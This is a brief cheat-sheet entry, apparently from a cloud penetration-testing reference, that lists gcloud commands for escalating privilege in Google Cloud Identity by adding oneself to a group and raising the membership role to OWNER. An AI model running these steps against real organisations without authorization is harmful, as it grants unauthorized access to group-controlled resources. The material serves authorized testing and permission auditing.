GCP - Cloudidentity Privesc

gcloud identity groups memberships add --group-email <email> --member-email <email> [--roles OWNER]
# If --roles isn't specified you will get MEMBER

# Check the current membership level
gcloud identity groups memberships describe --member-email <email> --group-email <email>

# If not OWNER try
gcloud identity groups memberships modify-membership-roles --group-email <email> --member-email <email> --add-roles=OWNER